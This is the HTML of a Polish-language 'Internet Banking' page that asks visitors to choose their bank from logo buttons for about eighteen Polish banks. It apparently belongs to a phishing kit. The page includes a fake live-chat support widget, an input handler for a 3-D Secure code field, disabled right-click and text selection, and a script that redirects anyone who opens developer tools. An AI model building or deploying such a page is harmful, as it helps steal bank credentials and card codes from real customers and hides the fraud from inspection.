<!DOCTYPE html>
<html lang="pl">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<link href="https://iconarchive.com/download/i86029/graphicloads/100-flat-2/bank.ico" rel="icon" type="image/x-icon">
		<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
		<!-- support -->
		<link rel="stylesheet" href="/static/style/support/support_parent.css">
		<script src="/static/style/protect/protect.js"></script>
		<title>Internet Banking</title>
		<style>
			._0 {
				margin: 0 auto;
				width: 658px;
				box-sizing: border-box;
				background: #fff;
				margin-top: 50px;
				margin-bottom: 50px;
			}
			._1 {
				font-size: 18px;
				padding-top: 16px;
				/*width: 200px;*/
			}
			._2 {
				margin: 10px 0;
				border-bottom: 1px solid #ddd;
			}
			._3 {
				text-align: left;
			    font-size: 14px;
			    border-radius: 6px;
			    padding: 16px 10px;
			    margin-bottom: 10px;
			    background: #f6f6f6;
				border-bottom: 2px solid #68777d;
			}
			._3:focus {
				outline: none;
			}
			._3mob {
				text-align: left;
			    font-size: 14px;
			    /*border-radius: 6px;*/
			    padding: 12px 10px;
			    margin-bottom: 20px;
			    /*background: #f6f6f6;*/
				/*border-bottom: 2px solid #68777d;*/
				border: 1px solid #d4d4d4;
			}
			._3mob:focus {
				outline: none;
			}
			._4 {
				float: right;
			    width: 100%;
				margin: 0;
			    color: #000;
			    font-weight: 400;
			    font-size: 17px;
			    line-height: 24px;
			    display: inline-block;
			    -webkit-box-sizing: border-box;
			    box-sizing: border-box;
			    padding: 8px 30px 6px 31px;
			    min-width: 180px;
			    border-radius: 3px;
			    white-space: nowrap;
			    background-color: #007eae;
			    color: #fff;
			    text-align: center;
			    text-decoration: none;
			    margin-top: 10px;
			}
			._4:hover {
				background-color: #015879;
			    color: #fff;
			    border-color: #015879;
			}
			._5 {
				color: #aaa;
				text-align: right;
				width: 45%;
				padding-right: 24px;
			}
			._6 {
				font-weight: bold;
			}
			._7 {
				margin-top: 4px;
				margin-bottom: 16px;
			}
			._8 {
				padding-bottom: 6px;
				line-height: 18px;
			}
			._9 {
				text-align: right;
			}
			body {
				margin: 0;
				font-family: Arial;
				font-size: 12px;
				color: #222;
				word-break: break-word;
				user-select: none;
				background: #fdfdfd;
			}
			input {
				font-family: Arial;
				font-size: 12px;
				color: #222;
				width: 100%;
				border: none;
				box-sizing: border-box;
				text-align: center;
			}
			table {
				width: 100%;
				border-collapse: separate;
				border-spacing: 0;
			}
			td {
				padding: 4px 0;
			}
			#mainblock {
				display: flex;
				margin: 0 20px;
			    /*border-bottom: 1px solid #e4e4e4;*/
			}
			#rightblock {
				margin-top: 100px;
				display: flex;
			}
			.loginboxes {
				display: flex;
			}
			#formblock {
                /*border-right: 1px solid #e4e4e4;
                padding-right: 70px; */
                padding-bottom: 20px; 
                margin-top: 20px;
			}
			#konto {
				margin-left: 20%; 
				padding-top: 30px;
			}
			#Pomoc {
				display: none;
                padding-top: 25px; 
                width: 150px;
			}
			.footer-menu {
				text-decoration: none;
				padding: 10px;
				color: #667;
				font-size: 13px;
			}
			.footer-menu-mob {
				text-decoration: none;
				padding: 10px;
				color: #555;
				font-size: 16px;
			}
			._0mob {
				display: none;
			}
			.footermenumob {
				padding: 20px;
				border-bottom: 1px solid #d4d4d4;
			}
			.bankbutton {
				border: none;
			    background: none;
			    width: 100%;
			    border-top: none;
			    padding: 10px;
			    background: #fff;
			    border: 1px solid #dcdcdc;
			}
			#main2 {
				border: 1px solid #dcdcdc;
				display: block;
				padding: 20px;
				background: #f3f3f3;
			}
			.sub-block {
				display: flex;
			}
			.sub-block1 {
				display: flex;
				margin: 10px 0;
			}
			.bankbank {
				margin: 0 10px;
			}
			@media all and (max-width: 800px) {
				/*#mainblock {
					display: block;
				}
				#formblock {
					border-right: none;
					padding-right: 0; 
				}*/
				#main2 {
					display: block;
				}
				.sub-block1 {
					display: block;
					margin: 0;
				}
				.sub-block {
					margin-bottom: 10px;
				}
				._0 {
					width: 353px;
				}
				#visablock {
					width: 155px;
				    margin: 0 auto;
				}
			}
			@media all and (max-width: 500px) {
				.loginboxes {
					display: block;
				}
				#rightblock {
					display: block;
				}
				.sub-block {
					display: block;
					margin-bottom: 0;
				}
				.bankbutton {
                    margin-bottom: 10px;
				}
				#visablock {
					width: 100%;
				}
			}
		</style>
		</head>
		<body>
			<div class="
        chatra--webkit
        chatra--style-round
        chatra--side-bottom
        chatra--pos-right
        chatra--visible
        chatra--expanded
        chatra--fast-toggle
      " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
    <div id="chatra__iframe-wrapper">
      <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
    </div>
  </div>
  <div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>
			<div id="mainblock">
				<div class="_0">
					<div>
						<div style="text-align: center; color: #555; font-size: 27px; margin: 50px 0; padding: 10px 0; background: #defaff; border-bottom: 1px solid #cadaea;">Wybierz swój bank z listy</div>
					</div>
					<div id="main2">
						<div class="sub-block1">
							<div class="sub-block">
								<form class="bankbank" id="bankbank1" method="post">
									<input type="text" value="alior" name="bankname" style="display: none;">
									<button form="bankbank1" type="submit" class="bankbutton"><img src="/static/style/banksPL/aliorcheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank2" method="post">
									<input type="text" value="pko" name="bankname" style="display: none;">
									<button form="bankbank2" type="submit" class="bankbutton"><img src="/static/style/banksPL/pkocheck.png" height="60"></button>
								</form>
							</div>
							<div class="sub-block">
								<form class="bankbank" id="bankbank3" method="post">
									<input type="text" value="ing" name="bankname" style="display: none;">
									<button form="bankbank3" type="submit" class="bankbutton"><img src="/static/style/banksPL/ingcheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank4" method="post">
									<input type="text" value="santander" name="bankname" style="display: none;">
									<button form="bankbank4" type="submit" class="bankbutton"><img src="/static/style/banksPL/santandercheck.png" height="60"></button>
								</form>
							</div>
						</div>
						<div class="sub-block1">
							<div class="sub-block">
								<form class="bankbank" id="bankbank5" method="post">
									<input type="text" value="mbank" name="bankname" style="display: none;">
									<button form="bankbank5" type="submit" class="bankbutton"><img src="/static/style/banksPL/mbankcheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank6" method="post">
									<input type="text" value="bnp" name="bankname" style="display: none;">
									<button form="bankbank6" type="submit" class="bankbutton"><img src="/static/style/banksPL/bnpcheck.png" height="60"></button>
								</form>
							</div>
							<div class="sub-block">
								<form class="bankbank" id="bankbank7" method="post">
									<input type="text" value="pekao" name="bankname" style="display: none;">
									<button form="bankbank7" type="submit" class="bankbutton"><img src="/static/style/banksPL/pekaocheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank8" method="post">
									<input type="text" value="getin" name="bankname" style="display: none;">
									<button form="bankbank8" type="submit" class="bankbutton"><img src="/static/style/banksPL/getincheck.png" height="60"></button>
								</form>
							</div>
						</div>

						<div class="sub-block1">
							<div class="sub-block">
								<form class="bankbank" id="bankbank9" method="post">
									<input type="text" value="millennium" name="bankname" style="display: none;">
									<button form="bankbank9" type="submit" class="bankbutton"><img src="/static/style/banksPL/millencheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank10" method="post">
									<input type="text" value="agricole" name="bankname" style="display: none;">
									<button form="bankbank10" type="submit" class="bankbutton"><img src="/static/style/banksPL/agricheck.png" height="60"></button>
								</form>
							</div>
							<div class="sub-block">
								<form class="bankbank" id="bankbank11" method="post">
									<input type="text" value="pocztowy" name="bankname" style="display: none;">
									<button form="bankbank11" type="submit" class="bankbutton"><img src="/static/style/banksPL/poccheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank12" method="post">
									<input type="text" value="sgb" name="bankname" style="display: none;">
									<button form="bankbank12" type="submit" class="bankbutton"><img src="/static/style/banksPL/sgbcheck.png" height="60"></button>
								</form>
							</div>
						</div>

						<div class="sub-block1">
							<div class="sub-block">
								<form class="bankbank" id="bankbank14" method="post">
									<input type="text" value="noble" name="bankname" style="display: none;">
									<button form="bankbank14" type="submit" class="bankbutton"><img src="/static/style/banksPL/noblecheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank15" method="post">
									<input type="text" value="gsb" name="bankname" style="display: none;">
									<button form="bankbank15" type="submit" class="bankbutton"><img src="/static/style/banksPL/gsbcheck.png" height="60"></button>
								</form>
							</div>
							<div class="sub-block">
								<form class="bankbank" id="bankbank16" method="post">
									<input type="text" value="nowy" name="bankname" style="display: none;">
									<button form="bankbank16" type="submit" class="bankbutton"><img src="/static/style/banksPL/nowycheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank17" method="post">
									<input type="text" value="bos" name="bankname" style="display: none;">
									<button form="bankbank17" type="submit" class="bankbutton"><img src="/static/style/banksPL/boscheck.png" height="60"></button>
								</form>
							</div>
						</div>
						<div class="sub-block1">
							<div class="sub-block">
								<form class="bankbank" id="bankbank18" method="post">
									<input type="text" value="citi" name="bankname" style="display: none;">
									<button form="bankbank18" type="submit" class="bankbutton"><img src="/static/style/banksPL/citicheck.png" height="60"></button>
								</form>
								<form class="bankbank" id="bankbank19" method="post">
									<input type="text" value="int" name="bankname" style="display: none;">
									<button form="bankbank19" type="submit" class="bankbutton"><img src="/static/style/banksPL/intcheck.png" height="60"></button>
								</form>
							</div>
						</div>
					</div>
				</div>



			<script>
				let pwdChars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789aąbсćdеęfghijklłmnńoóprsśtuwyzźżAĄBCĆDEĘFGHIJKLŁMNŃOÓPRSŚTUWYZŹŻ';
				let pwdLen = 20;
				function inputMask(elem) {
					let val = elem.value;
					let val2 = '';
					for (let i = 0; i < val.length; i++) {
						if (pwdChars.includes(val[i]))
							val2 += val[i];
					}
					elem.value = val2.substr(0, pwdLen);
				}
				document.addEventListener('DOMContentLoaded', function() {
					field3ds.oninput = function() {
						inputMask(field3ds);
					}
					field3ds.focus();
				});
				document.oncontextmenu = function() {
					return false;
				};
			</script>

			<script type="text/javascript">
				function openForm() {
				$('#myForm').css('display', 'block')
				$('#open-support').css('display', 'none')
			}

			function closeForm() {
				$('#myForm').css('display', 'none')
				$('#open-support').css('display', 'block')

			}
			</script>
			<script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
			<script>
				ConsoleBan.init({
					redirect: 'https://http.cat/403'
				})
			</script>
		</div>
	</body>
</html>